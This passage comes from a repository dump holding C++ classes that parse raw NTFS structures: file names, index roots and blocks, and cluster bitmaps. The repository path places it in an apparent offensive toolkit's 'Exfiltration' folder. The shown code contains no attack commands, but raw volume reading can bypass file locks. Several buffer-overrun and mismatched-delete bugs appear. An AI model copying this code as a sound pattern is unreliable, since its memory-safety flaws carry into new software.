0)\n\t{\n\t\tFileNameWUC = new wchar_t[FileNameLength+1];\n\t\tfor (int i=0; i<FileNameLength; i++)\n\t\t\tFileNameWUC[i] = towupper(fns[i]);\n\t\tFileNameWUC[FileNameLength] = wchar_t('\\0');\n\t}\n\telse\n\t{\n\t\tFileNameLength = 0;\n\t\tFileNameWUC = NULL;\n\t}\n}\n\n// Compare Unicode file name\nint CFileName::Compare(const wchar_t *fn) const\n{\n\t// Change fn to upper case\n\tint len = wcslen(fn);\n\tif (len > MAX_PATH)\n\t\treturn 1;\t// Assume bigger\n\n\twchar_t fns[MAX_PATH];\n\n\tfor (int i=0; i<len; i++)\n\t\tfns[i] = towupper(fn[i]);\n\tfns[len] = wchar_t('\\0');\n\n\treturn wcscmp(fns, FileNameWUC);\n}\n\n// Compare ANSI file name\nint CFileName::Compare(const char *fn) const\n{\n\twchar_t fnw[MAX_PATH];\n\n\tint len = MultiByteToWideChar(CP_ACP, 0, fn, -1, fnw, MAX_PATH);\n\tif (len)\n\t\treturn Compare(fnw);\n\telse\n\t\treturn 1;\t// Assume bigger\n}\n\n__inline ULONGLONG CFileName::GetFileSize() const\n{\n\treturn FileName ? FileName->RealSize : 0;\n}\n\n__inline DWORD CFileName::GetFilePermission() const\n{\n\treturn FileName ? FileName->Flags : 0;\n}\n\n__inline BOOL CFileName::IsReadOnly() const\n{\n\treturn FileName ? ((FileName->Flags) & ATTR_FILENAME_FLAG_READONLY) : FALSE;\n}\n\n__inline BOOL CFileName::IsHidden() const\n{\n\treturn FileName ? ((FileName->Flags) & ATTR_FILENAME_FLAG_HIDDEN) : FALSE;\n}\n\n__inline BOOL CFileName::IsSystem() const\n{\n\treturn FileName ? ((FileName->Flags) & ATTR_FILENAME_FLAG_SYSTEM) : FALSE;\n}\n\n__inline BOOL CFileName::IsDirectory() const\n{\n\treturn FileName ? ((FileName->Flags) & ATTR_FILENAME_FLAG_DIRECTORY) : FALSE;\n}\n\n__inline BOOL CFileName::IsCompressed() const\n{\n\treturn FileName ? ((FileName->Flags) & ATTR_FILENAME_FLAG_COMPRESSED) : FALSE;\n}\n\n__inline BOOL CFileName::IsEncrypted() const\n{\n\treturn FileName ? ((FileName->Flags) & ATTR_FILENAME_FLAG_ENCRYPTED) : FALSE;\n}\n\n__inline BOOL CFileName::IsSparse() const\n{\n\treturn FileName ? ((FileName->Flags) & ATTR_FILENAME_FLAG_SPARSE) : FALSE;\n}\n\n// Get ANSI File Name\n// Return 0: Unnamed, <0: buffer too small, -buffersize, >0 Name length\nint CFileName::GetFileName(char *buf, DWORD bufLen) const\n{\n\tif (FileName == NULL)\n\t\treturn 0;\n\n\tint len = 0;\n\n\tif (FileName->NameLength)\n\t{\n\t\tif (bufLen < FileName->NameLength)\n\t\t\treturn -1*FileName->NameLength;\t// buffer too small\n\n\t\tlen = WideCharToMultiByte(CP_ACP, 0, (wchar_t*)FileName->Name, FileName->NameLength,\n\t\t\t\tbuf, bufLen, NULL, NULL);\n\t\tif (len)\n\t\t{\n\t\t\tbuf[len] = '\\0';\n\t\t\tNTFS_TRACE1(\"File Name: %s\\n\", buf);\n\t\t\tNTFS_TRACE4(\"File Permission: %s\\t%c%c%c\\n\", IsDirectory()?\"Directory\":\"File\",\n\t\t\t\tIsReadOnly()?'R':' ', IsHidden()?'H':' ', IsSystem()?'S':' ');\n\t\t}\n\t\telse\n\t\t{\n\t\t\tNTFS_TRACE(\"Unrecognized File Name or FileName buffer too small\\n\");\n\t\t}\n\t}\n\n\treturn len;\n}\n\n// Get Unicode File Name\n// Return 0: Unnamed, <0: buffer too small, -buffersize, >0 Name length\nint CFileName::GetFileName(wchar_t *buf, DWORD bufLen) const\n{\n\tif (FileName == NULL)\n\t\treturn 0;\n\n\tif (FileName->NameLength)\n\t{\n\t\tif (bufLen < FileName->NameLength)\n\t\t\treturn -1*FileName->NameLength;\t// buffer too small\n\n\t\tbufLen = FileName->NameLength;\n\t\twcsncpy(buf, (wchar_t*)FileName->Name, bufLen);\n\t\tbuf[bufLen] = wchar_t('\\0');\n\n\t\treturn bufLen;\n\t}\n\n\treturn 0;\n}\n\n__inline BOOL CFileName::HasName() const\n{\n\treturn FileNameLength > 0;\n}\n\n__inline BOOL CFileName::IsWin32Name() const\n{\n\tif (FileName == NULL || FileNameLength <= 0)\n\t\treturn FALSE;\n\n\treturn (FileName->NameSpace != ATTR_FILENAME_NAMESPACE_DOS);\t// POSIX, WIN32, WIN32_DOS\n}\n\n// Change from UTC time to local time\nvoid CFileName::GetFileTime(FILETIME *writeTm, FILETIME *createTm, FILETIME *accessTm) const\n{\n\tCAttr_StdInfo::UTC2Local(FileName ? FileName->AlterTime : 0, writeTm);\n\n\tif (createTm)\n\t\tCAttr_StdInfo::UTC2Local(FileName ? FileName->CreateTime : 0, createTm);\n\n\tif (accessTm)\n\t\tCAttr_StdInfo::UTC2Local(FileName ? FileName->ReadTime : 0, accessTm);\n}\n\n\n////////////////////////////////\n// Attribute: File Name\n////////////////////////////////\nclass CAttr_FileName : public CAttrResident, public CFileName\n{\npublic:\n\tCAttr_FileName(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : CAttrResident(ahc, fr)\n\t{\n\t\tNTFS_TRACE(\"Attribute: File Name\\n\");\n\n\t\tSetFileName((ATTR_FILE_NAME*)AttrBody);\n\t}\n\n\tvirtual ~CAttr_FileName()\n\t{\n\t\tNTFS_TRACE(\"CAttr_FileName deleted\\n\");\n\t}\n\nprivate:\n\t// File permission and time in $FILE_NAME only updates when the filename changes\n\t// So hide these functions to prevent user from getting the error information\n\t// Standard Information and IndexEntry keeps the most recent file time and permission infomation\n\tvoid GetFileTime(FILETIME *writeTm, FILETIME *createTm = NULL, FILETIME *accessTm = NULL) const {}\n\t__inline DWORD GetFilePermission(){}\n\t__inline BOOL IsReadOnly() const {}\n\t__inline BOOL IsHidden() const {}\n\t__inline BOOL IsSystem() const {}\n\t__inline BOOL IsCompressed() const {}\n\t__inline BOOL IsEncrypted() const {}\n\t__inline BOOL IsSparse() const {}\n};\t// CAttr_FileName\n\n\n//////////////////////////////////\n// Attribute: Volume Information\n//////////////////////////////////\nclass CAttr_VolInfo : public CAttrResident\n{\npublic:\n\tCAttr_VolInfo(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : CAttrResident(ahc, fr)\n\t{\n\t\tNTFS_TRACE(\"Attribute: Volume Information\\n\");\n\n\t\tVolInfo = (ATTR_VOLUME_INFORMATION*)AttrBody;\n\t}\n\n\tvirtual ~CAttr_VolInfo()\n\t{\n\t\tNTFS_TRACE(\"CAttr_VolInfo deleted\\n\");\n\t}\n\nprivate:\n\tconst ATTR_VOLUME_INFORMATION *VolInfo;\n\npublic:\n\t// Get NTFS Volume Version\n\t__inline WORD GetVersion()\n\t{\n\t\treturn MAKEWORD(VolInfo->MinorVersion, VolInfo->MajorVersion);\n\t}\n}; // CAttr_VolInfo\n\n\n///////////////////////////\n// Attribute: Volume Name\n///////////////////////////\nclass CAttr_VolName : public CAttrResident\n{\npublic:\n\tCAttr_VolName(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : CAttrResident(ahc, fr)\n\t{\n\t\tNTFS_TRACE(\"Attribute: Volume Name\\n\");\n\n\t\tNameLength = AttrBodySize >> 1;\n\t\tVolNameU = new wchar_t[NameLength+1];\n\t\tVolNameA = new char[NameLength+1];\n\n\t\tmemcpy(VolNameU, AttrBody, AttrBodySize);\n\t\tVolNameU[NameLength] = wchar_t('\\0');\n\n\t\tint len = WideCharToMultiByte(CP_ACP, 0, VolNameU, NameLength,\n\t\t\tVolNameA, NameLength, NULL, NULL);\n\t\tVolNameA[NameLength] = '\\0';\n\t}\n\n\tvirtual ~CAttr_VolName()\n\t{\n\t\tNTFS_TRACE(\"CAttr_VolName deleted\\n\");\n\n\t\tdelete VolNameU;\n\t\tdelete VolNameA;\n\t}\n\nprivate:\n\twchar_t *VolNameU;\n\tchar *VolNameA;\n\tDWORD NameLength;\n\npublic:\n\t// Get NTFS Volume Unicode Name\n\t__inline int GetName(wchar_t *buf, DWORD len) const\n\t{\n\t\tif (len < NameLength)\n\t\t\treturn -1*NameLength;\t// buffer too small\n\n\t\twcsncpy(buf, VolNameU, NameLength+1);\n\t\treturn NameLength;\n\t}\n\n\t// ANSI Name\n\t__inline int GetName(char *buf, DWORD len) const\n\t{\n\t\tif (len < NameLength)\n\t\t\treturn -1*NameLength;\t// buffer too small\n\n\t\tstrncpy(buf, VolNameA, NameLength+1);\n\t\treturn NameLength;\n\t}\n}; // CAttr_VolInfo\n\n\n/////////////////////////////////////\n// Attribute: Data\n/////////////////////////////////////\ntemplate <class TYPE_RESIDENT>\nclass CAttr_Data : public TYPE_RESIDENT\n{\npublic:\n\tCAttr_Data(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : TYPE_RESIDENT(ahc, fr)\n\t{\n\t\tNTFS_TRACE1(\"Attribute: Data (%sResident)\\n\", IsNonResident() ? \"Non\" : \"\");\n\t}\n\n\tvirtual ~CAttr_Data()\n\t{\n\t\tNTFS_TRACE(\"CAttr_Data deleted\\n\");\n\t}\n};\t// CAttr_Data\n\n\n/////////////////////////////\n// Index Entry helper class\n/////////////////////////////\nclass CIndexEntry : public CFileName\n{\npublic:\n\tCIndexEntry()\n\t{\n\t\tNTFS_TRACE(\"Index Entry\\n\");\n\n\t\tIsDefault = TRUE;\n\n\t\tIndexEntry = NULL;\n\t\tSetFileName(NULL);\n\t}\n\n\tCIndexEntry(const INDEX_ENTRY *ie)\n\t{\n\t\tNTFS_TRACE(\"Index Entry\\n\");\n\n\t\tIsDefault = FALSE;\n\n\t\t_ASSERT(ie);\n\t\tIndexEntry = ie;\n\n\t\tif (IsSubNodePtr())\n\t\t{\n\t\t\tNTFS_TRACE(\"Points to sub-node\\n\");\n\t\t}\n\n\t\tif (ie->StreamSize)\n\t\t{\n\t\t\tSetFileName((ATTR_FILE_NAME*)(ie->Stream));\n\t\t}\n\t\telse\n\t\t{\n\t\t\tNTFS_TRACE(\"No FileName stream found\\n\");\n\t\t}\n\t}\n\n\tvirtual ~CIndexEntry()\n\t{\n\t\t// Never touch *IndexEntry here if IsCopy == FALSE !\n\t\t// As the memory have been deallocated by ~CIndexBlock()\n\n\t\tif (IsCopy && IndexEntry)\n\t\t\tdelete (void*)IndexEntry;\n\n\t\tNTFS_TRACE(\"CIndexEntry deleted\\n\");\n\t}\n\nprivate:\n\tBOOL IsDefault;\n\nprotected:\n\tconst INDEX_ENTRY *IndexEntry;\n\npublic:\n\t// Use with caution !\n\tCIndexEntry& operator = (const CIndexEntry &ieClass)\n\t{\n\t\tif (!IsDefault)\n\t\t{\n\t\t\tNTFS_TRACE(\"Cannot call this routine\\n\");\n\t\t\treturn *this;\n\t\t}\n\n\t\tNTFS_TRACE(\"Index Entry Copied\\n\");\n\n\t\tIsCopy = TRUE;\n\n\t\tif (IndexEntry)\n\t\t{\n\t\t\tdelete (void*)IndexEntry;\n\t\t\tIndexEntry = NULL;\n\t\t}\n\n\t\tconst INDEX_ENTRY *ie = ieClass.IndexEntry;\n\t\t_ASSERT(ie && (ie->Size > 0));\n\n\t\tIndexEntry = (INDEX_ENTRY*)new BYTE[ie->Size];\n\t\tmemcpy((void*)IndexEntry, ie, ie->Size);\n\t\tCopyFileName(&ieClass, (ATTR_FILE_NAME*)(IndexEntry->Stream));\n\n\t\treturn *this;\n\t}\n\n\t__inline ULONGLONG GetFileReference() const\n\t{\n\t\tif (IndexEntry)\n\t\t\treturn IndexEntry->FileReference & 0x0000FFFFFFFFFFFFUL;\n\t\telse\n\t\t\treturn (ULONGLONG)-1;\n\t}\n\n\t__inline BOOL IsSubNodePtr() const\n\t{\n\t\tif (IndexEntry)\n\t\t\treturn (IndexEntry->Flags & INDEX_ENTRY_FLAG_SUBNODE);\n\t\telse\n\t\t\treturn FALSE;\n\t}\n\n\t__inline ULONGLONG GetSubNodeVCN() const\n\t{\n\t\tif (IndexEntry)\n\t\t\treturn *(ULONGLONG*)((BYTE*)IndexEntry + IndexEntry->Size - 8);\n\t\telse\n\t\t\treturn (ULONGLONG)-1;\n\t}\n};\t// CIndexEntry\n\n\n///////////////////////////////\n// Index Block helper class\n///////////////////////////////\nclass CIndexBlock : public CIndexEntryList\n{\npublic:\n\tCIndexBlock()\n\t{\n\t\tNTFS_TRACE(\"Index Block\\n\");\n\n\t\tIndexBlock = NULL;\n\t}\n\n\tvirtual ~CIndexBlock()\n\t{\n\t\tNTFS_TRACE(\"IndexBlock deleted\\n\");\n\n\t\tif (IndexBlock)\n\t\t\tdelete IndexBlock;\n\t}\n\nprivate:\n\tINDEX_BLOCK *IndexBlock;\n\npublic:\n\tINDEX_BLOCK *AllocIndexBlock(DWORD size)\n\t{\n\t\t// Free previous data if any\n\t\tif (GetCount() > 0)\n\t\t\tRemoveAll();\n\t\tif (IndexBlock)\n\t\t\tdelete IndexBlock;\n\n\t\tIndexBlock = (INDEX_BLOCK*)new BYTE[size];\n\n\t\treturn IndexBlock;\n\t}\n};\t// CIndexBlock\n\n\n/////////////////////////////////////\n// Attribute: Index Root (Resident)\n/////////////////////////////////////\nclass CAttr_IndexRoot : public CAttrResident, public CIndexEntryList\n{\npublic:\n\tCAttr_IndexRoot(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttr_IndexRoot();\n\nprivate:\n\tconst ATTR_INDEX_ROOT *IndexRoot;\n\n\tvoid ParseIndexEntries();\n\npublic:\n\t__inline BOOL IsFileName() const;\n};\t// CAttr_IndexRoot\n\nCAttr_IndexRoot::CAttr_IndexRoot(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr): CAttrResident(ahc, fr)\n{\n\tNTFS_TRACE(\"Attribute: Index Root\\n\");\n\n\tIndexRoot = (ATTR_INDEX_ROOT*)AttrBody;\n\n\tif (IsFileName())\n\t{\n\t\tParseIndexEntries();\n\t}\n\telse\n\t{\n\t\tNTFS_TRACE(\"Index View not supported\\n\");\n\t}\n}\n\nCAttr_IndexRoot::~CAttr_IndexRoot()\n{\n\tNTFS_TRACE(\"CAttr_IndexRoot deleted\\n\");\n}\n\n// Get all the index entries\nvoid CAttr_IndexRoot::ParseIndexEntries()\n{\n\tINDEX_ENTRY *ie;\n\tie = (INDEX_ENTRY*)((BYTE*)(&(IndexRoot->EntryOffset)) + IndexRoot->EntryOffset);\n\n\tDWORD ieTotal = ie->Size;\n\n\twhile (ieTotal <= IndexRoot->TotalEntrySize)\n\t{\n\t\tCIndexEntry *ieClass = new CIndexEntry(ie);\n\t\tInsertEntry(ieClass);\n\n\t\tif (ie->Flags & INDEX_ENTRY_FLAG_LAST)\n\t\t{\n\t\t\tNTFS_TRACE(\"Last Index Entry\\n\");\n\t\t\tbreak;\n\t\t}\n\n\t\tie = (INDEX_ENTRY*)((BYTE*)ie + ie->Size);\t// Pick next\n\t\tieTotal += ie->Size;\n\t}\n}\n\n// Check if this IndexRoot contains FileName or IndexView\n__inline BOOL CAttr_IndexRoot::IsFileName() const\n{\n\treturn (IndexRoot->AttrType == ATTR_TYPE_FILE_NAME);\n}\n\n\n/////////////////////////////////////////////\n// Attribute: Index Allocation (NonResident)\n/////////////////////////////////////////////\nclass CAttr_IndexAlloc : public CAttrNonResident\n{\npublic:\n\tCAttr_IndexAlloc(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttr_IndexAlloc();\n\nprivate:\n\tULONGLONG IndexBlockCount;\n\n\tBOOL PatchUS(WORD *sector, int sectors, WORD usn, WORD *usarray);\n\npublic:\n\t__inline ULONGLONG GetIndexBlockCount();\n\tBOOL ParseIndexBlock(const ULONGLONG &vcn, CIndexBlock &ibClass);\n};\t// CAttr_IndexAlloc\n\nCAttr_IndexAlloc::CAttr_IndexAlloc(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : CAttrNonResident(ahc, fr)\n{\n\tNTFS_TRACE(\"Attribute: Index Allocation\\n\");\n\n\tIndexBlockCount = 0;\n\n\tif (IsDataRunOK())\n\t{\n\t\t// Get total number of Index Blocks\n\t\tULONGLONG ibTotalSize;\n\t\tibTotalSize = GetDataSize();\n\t\tif (ibTotalSize % _IndexBlockSize)\n\t\t{\n\t\t\tNTFS_TRACE2(\"Cannot calulate number of IndexBlocks, total size = %I64u, unit = %u\\n\",\n\t\t\t\t\tibTotalSize, _IndexBlockSize);\n\t\t\treturn;\n\t\t}\n\t\tIndexBlockCount = ibTotalSize / _IndexBlockSize;\n\t}\n\telse\n\t{\n\t\tNTFS_TRACE(\"Index Allocation DataRun parse error\\n\");\n\t}\n}\n\nCAttr_IndexAlloc::~CAttr_IndexAlloc()\n{\n\tNTFS_TRACE(\"CAttr_IndexAlloc deleted\\n\");\n}\n\n// Verify US and update sectors\nBOOL CAttr_IndexAlloc::PatchUS(WORD *sector, int sectors, WORD usn, WORD *usarray)\n{\n\tint i;\n\n\tfor (i=0; i<sectors; i++)\n\t{\n\t\tsector += ((_SectorSize>>1) - 1);\n\t\tif (*sector != usn)\n\t\t\treturn FALSE;\t\t// USN error\n\t\t*sector = usarray[i];\t// Write back correct data\n\t\tsector++;\n\t}\n\treturn TRUE;\n}\n\n__inline ULONGLONG CAttr_IndexAlloc::GetIndexBlockCount()\n{\n\treturn IndexBlockCount;\n}\n\n// Parse a single Index Block\n// vcn = Index Block VCN in Index Allocation Data Attributes\n// ibClass holds the parsed Index Entries\nBOOL CAttr_IndexAlloc::ParseIndexBlock(const ULONGLONG &vcn, CIndexBlock &ibClass)\n{\n\tif (vcn >= IndexBlockCount)\t// Bounds check\n\t\treturn FALSE;\n\n\t// Allocate buffer for a single Index Block\n\tINDEX_BLOCK *ibBuf = ibClass.AllocIndexBlock(_IndexBlockSize);\n\n\t// Sectors Per Index Block\n\tDWORD sectors = _IndexBlockSize / _SectorSize;\n\n\t// Read one Index Block\n\tDWORD len;\n\tif (ReadData(vcn*_IndexBlockSize, ibBuf, _IndexBlockSize, &len) &&\n\t\tlen == _IndexBlockSize)\n\t{\n\t\tif (ibBuf->Magic != INDEX_BLOCK_MAGIC)\n\t\t{\n\t\t\tNTFS_TRACE(\"Index Block parse error: Magic mismatch\\n\");\n\t\t\treturn FALSE;\n\t\t}\n\n\t\t// Patch US\n\t\tWORD *usnaddr = (WORD*)((BYTE*)ibBuf + ibBuf->OffsetOfUS);\n\t\tWORD usn = *usnaddr;\n\t\tWORD *usarray = usnaddr + 1;\n\t\tif (!PatchUS((WORD*)ibBuf, sectors, usn, usarray))\n\t\t{\n\t\t\tNTFS_TRACE(\"Index Block parse error: Update Sequence Number\\n\");\n\t\t\treturn FALSE;\n\t\t}\n\n\t\tINDEX_ENTRY *ie;\n\t\tie = (INDEX_ENTRY*)((BYTE*)(&(ibBuf->EntryOffset)) + ibBuf->EntryOffset);\n\n\t\tDWORD ieTotal = ie->Size;\n\n\t\twhile (ieTotal <= ibBuf->TotalEntrySize)\n\t\t{\n\t\t\tCIndexEntry *ieClass = new CIndexEntry(ie);\n\t\t\tibClass.InsertEntry(ieClass);\n\n\t\t\tif (ie->Flags & INDEX_ENTRY_FLAG_LAST)\n\t\t\t{\n\t\t\t\tNTFS_TRACE(\"Last Index Entry\\n\");\n\t\t\t\tbreak;\n\t\t\t}\n\n\t\t\tie = (INDEX_ENTRY*)((BYTE*)ie + ie->Size);\t// Pick next\n\t\t\tieTotal += ie->Size;\n\t\t}\n\n\t\treturn TRUE;\n\t}\n\telse\n\t\treturn FALSE;\n}\n\n\n////////////////////////////////////////////\n// Attribute: Bitmap\n////////////////////////////////////////////\ntemplate <class TYPE_RESIDENT>\nclass CAttr_Bitmap : public TYPE_RESIDENT\n{\npublic:\n\tCAttr_Bitmap(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttr_Bitmap();\n\nprivate:\n\tULONGLONG BitmapSize;\t// Bitmap data size\n\tBYTE *BitmapBuf;\t\t// Bitmap data buffer\n\tLONGLONG CurrentCluster;\n\npublic:\n\tBOOL IsClusterFree(const ULONGLONG &cluster) const;\n};\t// CAttr_Bitmap\n\ntemplate <class TYPE_RESIDENT>\nCAttr_Bitmap<TYPE_RESIDENT>::CAttr_Bitmap(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : TYPE_RESIDENT(ahc, fr)\n{\n\tNTFS_TRACE1(\"Attribute: Bitmap (%sResident)\\n\", IsNonResident() ? \"Non\" : \"\");\n\n\tCurrentCluster = -1;\n\n\tif (IsDataRunOK())\n\t{\n\t\tBitmapSize = GetDataSize();\n\n\t\tif (IsNonResident())\n\t\t\tBitmapBuf = new BYTE[_ClusterSize];\n\t\telse\n\t\t{\n\t\t\tBitmapBuf = new BYTE[(DWORD)BitmapSize];\n\n\t\t\tDWORD len;\n\t\t\tif (!(ReadData(0, BitmapBuf, (DWORD)BitmapSize, &len)\n\t\t\t\t&& len == (DWORD)BitmapSize))\n\t\t\t{\n\t\t\t\tBitmapBuf = NULL;\n\t\t\t\tNTFS_TRACE(\"Read Resident Bitmap data failed\\n\");\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tNTFS_TRACE1(\"%u bytes of resident Bitmap data read\\n\", len);\n\t\t\t}\n\t\t}\n\t}\n\telse\n\t{\n\t\tBitmapSize = 0;\n\t\tBitmapBuf = 0;\n\t}\n}\n\ntemplate <class TYPE_RESIDENT>\nCAttr_Bitmap<TYPE_RESIDENT>::~CAttr_Bitmap()\n{\n\tif (BitmapBuf)\n\t\tdelete BitmapBuf;\n\n\tNTFS_TRACE(\"CAttr_Bitmap deleted\\n\");\n}\n\n// Verify if a single cluster is free\ntemplate <class TYPE_RESIDENT>\nBOOL CAttr_Bitmap<TYPE_RESIDENT>::IsClusterFree(const ULONGLONG &cluster) const\n{\n\tif (!IsDataRunOK() || !BitmapBuf)\n\t\treturn FALSE;\n\n\tif (IsNonResident())\n\t{\n\t\tLONGLONG idx = (LONGLONG)cluster >> 3;\n\t\tDWORD clusterSize = ((CNTFSVolume*)Volume)->GetClusterSize();\n\n\t\tLONGLONG clusterOffset = idx/clusterSize;\n\t\tcluster -= (clusterOffset*clusterSize*8);\n\n\t\t// Read one cluster of data if buffer mismatch\n\t\tif (CurrentCluster != clusterOffset)\n\t\t{\n\t\t\tDWORD len;\n\t\t\tif (ReadData(clusterOffset, BitmapBuf, clusterSize, &len) && len == clusterSize)\n\t\t\t{\n\t\t\t\tCurrentCluster = clusterOffset;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tCurrentCluster = -1;\n\t\t\t\treturn FALSE;\n\t\t\t}\n\t\t}\n\t}\n\n\t// All the Bitmap data is already in BitmapBuf\n\tDWORD idx = (DWORD)(cluster >> 3);\n\tif (IsNonResident() == FALSE)\n\t{\n\t\tif (idx >= BitmapSize)\n\t\t\treturn TRUE;\t// Resident data bounds check error\n\t}\n\n\tBYTE fac = (BYTE)(cluster % 8);\n\n\treturn ((BitmapBuf[idx] & (1<<fac)) == 0);\n}\n\n\n////////////////////////////////////////////\n// List to hold external File Records\n////////////////////////////////////////////\ntypedef CSList<CFileRecord> CFileRecordList;\n\n////////////////////////////////////////////\n// Attribute: Attribute List\n////////////////////////////////////////////\ntemplate <class TYPE_RESIDENT>\nclass CAttr_AttrList : public TYPE_RESIDENT\n{\npublic:\n\tCAttr_AttrList(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr);\n\tvirtual ~CAttr_AttrList();\n\nprivate:\n\tCFileRecordList FileRecordList;\n};\t// CAttr_AttrList\n\ntemplate <class TYPE_RESIDENT>\nCAttr_AttrList<TYPE_RESIDENT>::CAttr_AttrList(const ATTR_HEADER_COMMON *ahc, const CFileRecord *fr) : TYPE_RESIDENT(ahc, fr)\n{\n\tNTFS_TRACE(\"Attribute: Attribute List\\n\");\n\tif (fr->FileReference == (ULONGLONG)-1)\n\t\treturn;\n\n\tULONGLONG offset = 0;\n\tDWORD len;\n\tATTR_ATTRIBUTE_LIST alRecord;\n\n\twhile (ReadData(offset, &alRecord, sizeof(ATTR_ATTRIBUTE_LIST), &len) &&\n\t\tlen == sizeof(ATTR_ATTRIBUTE_LIST))\n\t{\n\t\tif (ATTR_INDEX(alRecord.AttrType) > ATTR_NUMS)\n\t\t{\n\t\t\tNTFS_TRACE(\"Attribute List parse error1\\n\");\n\t\t\tbreak;\n\t\t}\n\n\t\tNTFS_TRACE1(\"Attribute List: 0x%04x\\n\", alRecord.AttrType);\n\n\t\tULONGLONG recordRef = alRecord.BaseRef & 0x0000FFFFFFFFFFFFUL;\n\t\tif (recordRef != fr->FileReference)\t// Skip contained attributes\n\t\t{\n\t\t\tDWORD am = ATTR_MASK(alRecord.AttrType);\n\t\t\tif (am & fr->AttrMask)\t// Skip unwanted attributes\n\t\t\t{\n\t\t\t\tCFileRecord *frnew = new CFileRecord(fr->Volume);\n\t\t\t\tFileRecordList.InsertEntry(frnew);\n\n\t\t\t\tfrnew->AttrMask = am;\n\t\t\t\tif (!frnew->ParseFileRecord(recordRef))\n\t\t\t\t{\n\t\t\t\t\tNTFS_TRACE(\"Attribute List parse error2\\n\");\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tfrnew->ParseAttrs();\n\n\t\t\t\t// Insert new found AttrList to fr->AttrList\n\t\t\t\tconst CAttrBase *ab = (CAttrBase*)frnew->FindFirstAttr(alRecord.AttrType);\n\t\t\t\twhile (ab)\n\t\t\t\t{\n\t\t\t\t\tCAttrList *al = (CAttrList*)&fr->AttrList[ATTR_INDEX(alRecord.AttrType)];\n\t\t\t\t\tal->InsertEntry((CAttrBase*)ab);\n\t\t\t\t\tab = frnew->FindNextAttr(alRecord.AttrType);\n\t\t\t\t}\n\n\t\t\t\t// Throw away frnew->AttrList entries to prevent free twice (fr will delete them)\n\t\t\t\tfrnew->AttrList[ATTR_INDEX(alRecord.AttrType)].ThrowAll();\n\t\t\t}\n\t\t}\n\n\t\toffset += alRecord.RecordSize;\n\t}\n}\n\ntemplate <class TYPE_RESIDENT>\nCAttr_AttrList<TYPE_RESIDENT>::~CAttr_AttrList()\n{\n\tNTFS_TRACE(\"CAttr_AttrList deleted\\n\");\n}\n\n#endif\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParserDLL/NTFS_Common.h",
    "content": "/*\n * NTFS Class common definitions\n * \n * Copyright(C) 2010 cyb70289 <cyb70289@gmail.com>\n *\n * This program/include file is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License as published\n * by the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program/include file is distributed in the hope that it will be\n * useful, but WITHOUT ANY WARRANTY; without even the implied warranty\n * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n */\n\n#ifndef\t__NTFS_COMMON_H_CYB70289\n#define\t__NTFS_COMMON_H_CYB70289\n\n#include <windows.h>\n#include <stdio.h>\n#include <tchar.h>\n#include <crtdbg.h>\n\n#include \"NTFS_DataType.h\"\n\n#define\tATTR_NUMS\t\t16\t\t\t\t// Attribute Types count\n#define\tATTR_INDEX(at)\t(((at)>>4)-1)\t// Attribute Type to Index, eg. 0x10->0, 0x30->2\n#define\tATTR_MASK(at)\t(((DWORD)1)<<ATTR_INDEX(at))\t// Attribute Bit Mask\n\n// Bit masks of Attributes\n#define\tMASK_STANDARD_INFORMATION\tATTR_MASK(ATTR_TYPE_STANDARD_INFORMATION)\n#define\tMASK_ATTRIBUTE_LIST\t\t\tATTR_MASK(ATTR_TYPE_ATTRIBUTE_LIST)\n#define\tMASK_FILE_NAME\t\t\t\tATTR_MASK(ATTR_TYPE_FILE_NAME)\n#define\tMASK_OBJECT_ID\t\t\t\tATTR_MASK(ATTR_TYPE_OBJECT_ID)\n#define\tMASK_SECURITY_DESCRIPTOR\tATTR_MASK(ATTR_TYPE_SECURITY_DESCRIPTOR)\n#define\tMASK_VOLUME_NAME\t\t\tATTR_MASK(ATTR_TYPE_VOLUME_NAME)\n#define\tMASK_VOLUME_INFORMATION\t\tATTR_MASK(ATTR_TYPE_VOLUME_INFORMATION)\n#define\tMASK_DATA\t\t\t\t\tATTR_MASK(ATTR_TYPE_DATA)\n#define\tMASK_INDEX_ROOT\t\t\t\tATTR_MASK(ATTR_TYPE_INDEX_ROOT)\n#define\tMASK_INDEX_ALLOCATION\t\tATTR_MASK(ATTR_TYPE_INDEX_ALLOCATION)\n#define\tMASK_BITMAP\t\t\t\t\tATTR_MASK(ATTR_TYPE_BITMAP)\n#define\tMASK_REPARSE_POINT\t\t\tATTR_MASK(ATTR_TYPE_REPARSE_POINT)\n#define\tMASK_EA_INFORMATION\t\t\tATTR_MASK(ATTR_TYPE_EA_INFORMATION)\n#define\tMASK_EA\t\t\t\t\t\tATTR_MASK(ATTR_TYPE_EA)\n#define\tMASK_LOGGED_UTILITY_STREAM\tATTR_MASK(ATTR_TYPE_LOGGED_UTILITY_STREAM)\n\n#define\tMASK_ALL\t\t\t\t\t((DWORD)-1)\n\n#define\tNTFS_TRACE(t1)\t\t\t\t\t_RPT0(_CRT_WARN, t1)\n#define\tNTFS_TRACE1(t1, t2)\t\t\t\t_RPT1(_CRT_WARN, t1, t2)\n#define\tNTFS_TRACE2(t1, t2, t3)\t\t\t_RPT2(_CRT_WARN, t1, t2, t3)\n#define\tNTFS_TRACE3(t1, t2, t3, t4)\t\t_RPT3(_CRT_WARN, t1, t2, t3, t4)\n#define\tNTFS_TRACE4(t1, t2, t3, t4, t5)\t_RPT4(_CRT_WARN, t1, t2, t3, t4, t5)\n\n// User defined Callback routines to process raw attribute data\n// Set bDiscard to TRUE if this Attribute is to be discarded\n// Set bDiscard to FALSE to let 